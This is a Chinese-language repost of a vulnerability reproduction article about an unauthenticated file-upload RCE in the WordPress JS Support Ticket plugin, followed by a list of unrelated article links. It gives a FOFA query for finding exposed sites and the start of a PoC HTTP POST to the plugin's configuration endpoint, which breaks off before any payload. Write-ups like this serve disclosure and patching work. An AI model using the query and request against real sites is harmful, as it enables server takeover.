当前位置: 首页 > news >正文

WordPress JS Support Ticket插件 RCE漏洞复现

news 2025/8/22 18:18:46

0x01 产品简介

WordPress和WordPress plugin都是WordPress基金会的产品。JS Support Ticket是使用在其中的一套开源票务系统插件。

0x02 漏洞概述

WordPress中的JS Support Ticket插件存在未经上传漏洞,未经身份验证的攻击者可以上传恶意脚本的服务器,执行任意指令,从而获取服务器权限。

0x03 复现环境

FOFA:body="wp-content/plugins/js-support-ticket"

0x04 漏洞复现

PoC

POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host: your-ip
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=b983c629ca9b1450283a9b8d1b953898--b983c629ca9b1450283a9b8d1b953898
Content-Disposition: form-data; name="support
http://www.lryc.cn/news/340901.html

相关文章:

  • 加盟代理短视频无人直播项目,开启互联网线上经营新模式
  • spring高级篇(一)
  • 免费的GPT-3.5 API服务aurora
  • 突破编程_C++_网络编程(Windows 套接字(处理 TCP 粘包问题))
  • 【训练营】DateWhale——动手学大模型应用开发(更新中)
  • 【学习笔记十九】EWM Yard Management概述及后台配置
  • 【环境搭建】(五)Ubuntu22.04安装cuda_11.8.0+cudnn_8.6.0
  • 【UE5.1】使用MySQL and MariaDB Integration插件——(3)表格形式显示数据
  • JVM复习
  • 63、ARM/STM32中IIC相关学习20240417
  • 离岸人民币与人民币国际化
  • Linux平台上部署和运行Ollama的全面指南
  • Web---robots协议详解
  • 华为海思校园招聘-芯片-数字 IC 方向 题目分享——第四套
  • clipper一些数据结构(入门初识(一))
  • 读《SQL基础教程 第二版 上》的一些总结
  • EDI是什么:EDI系统功能介绍
  • 64B/66B GT Transceiver 配置
  • ES6: promise对象与回调地狱
  • Qt事件处理机制2-事件函数的传播
  • 【PDF.js】PDF文件预览
  • 从建表语句带你学习doris_表索引
  • Linux CentOS 安装 MySQL 服务教程
  • MSSQL 命令行操作说明 sql server 2022 命令行下进行配置管理
  • 【系统分析师】系统安全分析与设计
  • ActiveMQ 07 集群配置
  • Redis(哨兵模式)
  • 一种基于镜像指示位办法的RingBuffer实现,解决Mirror和2的幂个数限制
  • 【Java开发指南 | 第十一篇】Java运算符
  • 【IC前端虚拟项目】验证环境方案思路和文档组织